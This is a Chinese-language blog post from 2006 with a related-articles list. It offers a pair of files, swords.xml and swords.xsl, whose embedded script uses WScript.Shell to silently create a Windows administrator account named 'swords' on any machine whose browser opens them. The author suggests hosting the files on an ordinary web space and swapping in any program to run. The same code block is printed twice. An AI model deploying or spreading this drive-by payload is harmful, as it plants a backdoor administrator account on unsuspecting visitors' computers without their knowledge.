利用xml+xsl给客户机添加超级管理帐户!
2006-11-25 22:44
344 查看
用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.
这个程序加了一个用户为 swords,密码为est的超级管理员账号。
swords.xml
<?xml version="1.0" encoding="GB2312"?>
<?xml-stylesheet type="text/xsl" href="swords.xsl"?>
<name>I am swords,I am admin!</name>
swords.xsl
<?xml version="1.0" encoding="gb2312"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:template match="/">
<html>
<body>
<xsl:value-of select="name" />
<xsl:script>
function run()
{
var wsh;
var wsh = new ActiveXObject("WScript.Shell");
wsh.run( "net user swords est /add",0);
wsh.run( "net localgroup administrators swords /add",0);
wsh.run( "cmd.exe /c echo test!");
}
</xsl:script>
<xsl:eval>run()</xsl:eval>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
这个程序加了一个用户为 swords,密码为est的超级管理员账号。
swords.xml
<?xml version="1.0" encoding="GB2312"?>
<?xml-stylesheet type="text/xsl" href="swords.xsl"?>
<name>I am swords,I am admin!</name>
swords.xsl
<?xml version="1.0" encoding="gb2312"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:template match="/">
<html>
<body>
<xsl:value-of select="name" />
<xsl:script>
function run()
{
var wsh;
var wsh = new ActiveXObject("WScript.Shell");
wsh.run( "net user swords est /add",0);
wsh.run( "net localgroup administrators swords /add",0);
wsh.run( "cmd.exe /c echo test!");
}
</xsl:script>
<xsl:eval>run()</xsl:eval>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
相关文章推荐
- 利用xml+xsl给客户机添加超级管理帐户!
- 利用xml+xsl给客户机添加超级管理帐户!
- 利用xml+xsl给客户机添加超级管理帐户
- Axis2发布webservice(4)—利用XML文件同时发布多个webservice和跨多个WebService管理Session
- 利用Flash+XML制作可后台管理的电子地图
- 利用XML和XSL建立源代码产生模板
- 利用XSL解析XML为XHTML碰到的取值问题
- 利用XSL双向转换XML文档
- Tomcat7.0添加管理用户的xml内容,在ubuntu下通过
- 利用XSL对XML数据进行加密和大小写转换
- android学生管理系统,利用linerLayout,实现xml的读取和写入,以及按钮的事件处理
- SQL文的管理和解析(一)利用Spring的Resource管理SQL的XML配置文件
- 利用XSL对XML数据进行加密和大小写转换
- 利用XSL双向转换XML文档
- 利用XSL对XML数据进行加密和大小写转换
- 谈谈CMS内容管理系统的两种方案:XSL+XML和HTML
- 一步一步SharePoint 2007之十二:实现Form认证(2)——创建添加管理帐户的工程
- 在form 窗体 利用xml和xsl来实现表的嵌套
- 【大规模企业级应用性能管理实践】利用APM打磨超级性能
- [导入]利用XSL对XML数据进行加密和大小写转换